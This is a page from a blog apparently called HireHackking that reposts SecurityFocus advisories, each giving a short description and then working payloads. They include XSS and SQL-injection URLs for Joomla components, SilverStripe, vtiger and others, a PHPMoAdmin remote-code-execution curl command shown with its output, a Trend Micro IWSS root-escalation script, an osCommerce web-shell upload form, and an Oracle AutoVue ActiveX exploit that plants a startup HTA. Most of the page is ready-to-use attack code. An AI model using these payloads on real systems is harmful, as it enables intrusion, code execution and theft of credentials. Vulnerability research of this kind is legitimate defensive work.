Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863583527

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

source: https://www.securityfocus.com/bid/50039/info

GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

GoAhead WebServer 2.18 is vulnerable; other versions may also be affected. 

POST /goform/AddGroup HTTP/1.1
group=<script>alert(1337)</script>&privilege=4&method=1&enabled=on&ok=OK
            
source: https://www.securityfocus.com/bid/50039/info
  
GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
  
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
  
GoAhead WebServer 2.18 is vulnerable; other versions may also be affected. 

POST /goform/AddUser HTTP/1.1
user=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&group=%3Cscript%3Ealert%281337%2
9%3C%2Fscript%3E&enabled=on&password=test&passconf=test&ok=OK
            
source: https://www.securityfocus.com/bid/50041/info

The 'com_tree' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_tree&Itemid=11&key=-77 uNIOn select 0,version(),2-- 
            
source: https://www.securityfocus.com/bid/50042/info

The 'com_br' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=-33 union select 0,1,version(),3 
            
HireHackking

Joomla! Component com_shop - 'id' SQL Injection

source: https://www.securityfocus.com/bid/50043/info The 'com_shop' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_shop&view=details&id=-29 union select 0,1,2,version(),4,5,6,7,8,9,10,11,12
HireHackking
source: https://www.securityfocus.com/bid/50050/info 6KBBS is prone to multiple cross-site scripting and information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 6KBBS 8.0 build 20101201 is vulnerable; other versions may also be affected. http://www.example.com/credits.php?'[XSS] http://www.example.com/forum.php?'[XSS] http://www.example.com/index.php?'[XSS] http://www.example.com/login.php?'[XSS] http://www.example.com/online.php?'[XSS] http://www.example.com/getfiles.php?f=http://xxx&t=js http://www.example.com/admin/portalcollect.php?f=http://xxx&t=js
HireHackking
source: https://www.securityfocus.com/bid/50063/info SilverStripe is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SilverStripe 2.4.5 is vulnerable; other versions may also be affected. http://www.example.com/SilverStripe-v2.4.5/admin/reports/?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/comments/?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/4?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/2?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/root?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/3?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/assets/?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/1?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/show/5?&#039;"</script><script>alert(document.cookie)</script> http://www.example.com/SilverStripe-v2.4.5/admin/security/?&#039;"</script><script>alert(document.cookie)</script>
HireHackking
source: https://www.securityfocus.com/bid/50083/info BugFree is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. BugFree 2.1.3 is vulnerable; other versions may also be affected. http://www.example.com/Bug.php?BugID=1&ActionType=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/Report.php?ReportMode=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/ReportLeft.php?ReportMode=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/AdminProjectList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/AdminGroupList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/AdminUserLogList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking
source: https://www.securityfocus.com/bid/50295/info Innovate Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound
HireHackking
source: https://www.securityfocus.com/bid/50298/info Splunk is prone to a remote denial-of-service vulnerability. Exploiting this issue will exhaust system resources and cause the application to crash, denying service to legitimate users. http://www.example.com/en-US/prototype/segmentation_performance?lines=999&depth=99999999&segment=foo&element=span&attribute=class&segmentation=nested http://www.example.com/en-US/prototype/segmentation_performance?lines=99999999999999999999999999999999999999&depth=99999999999999999999999999999999999999&segment=foo&element=span&attribute=class&segmentation=nested https://localhost/en-US/debug/sso
HireHackking
source: https://www.securityfocus.com/bid/50307/info Tine is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Tine 2.0 is vulnerable; other versions may also be affected. http://www.example.com/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/library/idnaconvert/example.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/library/phpexcel/phpexcel/shared/jama/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cooki e%29;%3C/script%3E
HireHackking

PHPMoAdmin - Unauthorized Remote Code Execution

###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # PHPMoAdmin Unauthorized Remote Code Execution (0-Day) # Website : http://www.phpmoadmin.com/ # Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio # Release dates : March 3, 2015 # # Special Thanks to 2600 Thailand group # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ PHPMoAdmin is a MongoDB administration tool for PHP built on a stripped-down version of the Vork high-performance framework. [+] Exploit ============================================================ Someone was trying to sale this shit for 3000usd lolz $ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ============================================================ PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 34 object=1;system('id;ls -lha');exit HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 16:57:40 GMT Server: Apache/2.4.7 (Ubuntu) Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 223 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html uid=33(www-data) gid=33(www-data) groups=33(www-data) total 116K drwxr-xr-x 1 longcat longcat 102 Mar 3 16:55 . drwxr-xr-x 6 root root 4.0K Mar 3 16:17 .. -rw-rw-r-- 1 longcat longcat 112K Mar 3 16:55 moadmin.php [+] Vulnerability Analysis ============================================================ Filename: moadmin.php 1. create new moadminComponent object 1977: $mo = new moadminComponent; 2. if the http-post parameter 'object' is set 738: class moadminComponent { ... 762: public function __construct() { ... 786: if (isset($_POST['object'])) { 787: if (self::$model->saveObject($_GET['collection'], $_POST['object'])) { ... 3. evaluate the value of 'object' as PHP code 692: public function saveObject($collection, $obj) { 693: eval('$obj=' . $obj . ';'); //cast from string to array
HireHackking
source: https://www.securityfocus.com/bid/50344/info InverseFlow is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. InverseFlow 2.4 is vulnerable; other versions may also be affected. http://www.example.com/inver/inverseflow/ticketview.php?email= [XSS] http://www.example.com/inver/inverseflow/ticketview.php?email=&id=[XSS] http://www.example.com/inver/inverseflow/login.php?redirect=[XSS]
HireHackking
source: https://www.securityfocus.com/bid/50364/info vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. http://www.example.com/modules/mobile/index.php?_operation="><script>alert(1)</script> http://www.example.com/modules/mobile/index.php?_operation=listModuleRecords&module=Services&search="><script>alert(1)</script>
HireHackking
source: https://www.securityfocus.com/bid/50380/info Trendmicro IWSS is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with root privileges and completely compromise the affected computer. Trendmicro IWSS 3.1 is vulnerable; other versions may also be affected. #!/bin/bash # Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com cd /tmp echo "[*] Creating shell file" echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh echo "[*] Change permissions" chmod 755 PatchExe.sh echo "[*] Got r00t... Its free!" /opt/trend/iwss/data/patch/bin/patchCmd u root
HireHackking

2Moons 1.4 - Multiple Remote File Inclusions

source: https://www.securityfocus.com/bid/50046/info 2Moons is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. 2Moons 1.4 is vulnerable; other versions may also be affected. http://www.example.com/2Moons/CombatReport.php?RID=[EV!L] http://www.example.com/2Moons/includes/common.php?UNI=[EV!L] http://www.example.com/2Moons/includes/classes/class.FlyingFleetHandler.php?MissionsPattern[CurrentFleet[fleet_mission]]=[EV!L] http://www.example.com/2Moons/includes/classes/class.FlyingFleetHandler.php?CurrentFleet[fleet_mission]]=[EV!L] http://www.example.com/2Moons/includes/classes/class.Lang.php?Lang=[EV!L] http://www.example.com/2Moons/includes/classes/class.Lang.php?File=[EV!L] http://www.example.com/2Moons/includes/classes/class.Lang.php?File=[EV!L] http://www.example.com/2Moons/includes/classes/class.Lang.php?LANGUAGE=[EV!L] http://www.example.com/2Moons/includes/classes/class.Lang.php?File=[EV!L] http://www.example.com/2Moons/includes/classes/class.Records.php?File=[EV!L] http://www.example.com/2Moons/includes/pages/ShowTopKB.php?ReportID=[EV!L] http://www.example.com/2Moons/includes/libs/Smarty/Smarty.class.php?file=[EV!L] http://www.example.com/2Moons/includes/pages/adm/ShowModVersionPage.php?File=[EV!L] http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_resource_php.php?_smarty_template=[EV!L] http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php?file=[EV!L]
HireHackking

ContaoCMS 2.10.1 - Cross-Site Scripting

source: https://www.securityfocus.com/bid/50061/info Contao is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Contao 2.10.1 is vulnerable; other versions may also be affected. http://www.example.com/contao-2.10.1/index.php/teachers.html?"/><script>alert(&#039;xss&#039;)</script> http://www.example.com/contao-2.10.1/index.php/teachers/&#039;"</style></script><script>alert(document.cookie)</script>
HireHackking
source: https://www.securityfocus.com/bid/50072/info The Sgicatalog component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Sgicatalog 1.0 is vulnerable; other versions may also be affected. http://www.example.com/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]
HireHackking
source: https://www.securityfocus.com/bid/50286/info Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Boonex Dolphin 6.1 is vulnerable; other versions may also be affected. http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) )
HireHackking

Splunk 4.1.6 - 'segment' Cross-Site Scripting

source: https://www.securityfocus.com/bid/50296/info Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Splunk versions 4.2.2 and prior are vulnerable. http://www.example.com/en-US/prototype/segmentation_performance?lines=2&depth=2&segment=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&element=aaa&attribute=aaa&segmentation=flattened
HireHackking
source: https://www.securityfocus.com/bid/50301/info osCommerce is prone to a remote file upload and a file disclosure vulnerability. The issues occur because the application fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload a file and obtain an arbitrary file's content; other attacks are also possible. The following URL is available for the file disclosure vulnerability: http://www.example.com/admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php The following exploit is available for the remote file upload vulnerability: <html><head><title> creloaded - Remote File Upload </title></head> <br><br><u>UPLOAD FILE:</u><br> <form name="file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> <input type="file" name="file_1"><br> <input name="submit" type="submit" value=" Upload " > </form> <br><u>CREATE FILE:</u><br> <form name="new_file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=save" method="post"> FILE NAME:<br> <input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br> <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; <input name="submit" type="submit" value=" Save " > </form>
HireHackking
source: https://www.securityfocus.com/bid/50332/info Oracle AutoVue 'AutoVueX.ocx' ActiveX control is prone to a vulnerability caused by an insecure method. Successfully exploiting this issue will allow attackers to create or overwrite arbitrary files on a victim's computer within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Oracle AutoVue 20.0.1 is vulnerable; other versions may also be affected. <!-- Oracle AutoVue AutoVueX ActiveX Control ExportEdaBom Remote Code Execution ProgID: AUTOVUEX.AutoVueXCtrl.1 CLSID: {B6FCC215-D303-11D1-BC6C-0000C078797F} Binary path: C:\PROGRA~1\av\avwin\AutoVueX.ocx Safe for initialization (registry): true Safe for scripting (registry): true rgod --> <!-- saved from url=(0014)about:internet --> <html> <object classid='clsid:B6FCC215-D303-11D1-BC6C-0000C078797F' id='obj' width=640 & height=480 /> <param name=SRC value="PADS_Evaluation_board.pcb"></param> </object> <script defer="defer"> var sh = "<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>"; for (i=0; i<6666; i++) { obj.ExportEdaBom("../../../../../../../../../../../Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta","aaaa",true,sh); } window.location.href = window.location.href; </script>
HireHackking

e107 0.7.24 - 'cmd' Remote Command Execution

source: https://www.securityfocus.com/bid/50339/info e107 is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied input. An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application. e107 0.7.24 is vulnerable; other versions may also be affected. http://www.example.com/e107_config.php?cmd=id
HireHackking
source: https://www.securityfocus.com/bid/50350/info Alsbtain Bulletin is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Alsbtain Bulletin 1.5 and 1.6 are vulnerable; other versions may also be affected. http://www.example.com/index.php?style=[LFI]%00 http://www.example.com/index.php?act=[LFI]%00
HireHackking

XAMPP 1.7.4 - Cross-Site Scripting

source: https://www.securityfocus.com/bid/50381/info XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues affect XAMPP 1.7.4 for Windows and prior. http://www.example.com/xampp/ming.php?text=[xss] http://www.example.com/xampp/cds.php/[xss]